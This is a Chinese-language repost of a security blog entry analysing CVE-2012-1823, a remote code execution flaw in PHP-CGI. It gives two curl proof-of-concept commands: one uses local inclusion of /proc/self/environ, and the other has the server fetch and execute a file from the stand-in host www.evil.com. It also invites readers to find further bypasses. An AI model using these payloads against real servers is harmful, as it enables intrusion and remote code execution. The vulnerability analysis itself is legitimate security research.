CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

admin 2021年4月3日19:59:50评论57 views字数 828阅读2分45秒阅读模式

国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。

另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。

那么利用它能做什么呢?我给出如下两个RCE的PoC方案:

1、本地包含直接执行代码:

curl -H "USER-AGENT: " http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:

curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt

经过测试以上两者都可以,但其实就是一个包含文件的两种使用而已。

各位看看还有什么牛逼的方法可以绕过限制直接远程执行代码呢?这会是一个很好玩的技术挑战。

转自:http://zone.wooyun.org/content/151

文章来源于lcx.cc:CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战

相关推荐: 电影/电视剧/纪实片 信用卡信息泄漏猜想

电影/电视剧/纪实片 信用卡信息泄漏猜想 safe121 (--黑阔娱乐群:328034840) | 2013-09-08 21:12 前几天看某电视节目,超高清的,有一段是刷卡的。然后主人公把信用卡拿出的瞬间,我点了暂停,发现不清晰,之后把那段截下来,一帧一…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:59:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战http://cn-sec.com/archives/324786.html

发表评论

匿名网友 填写信息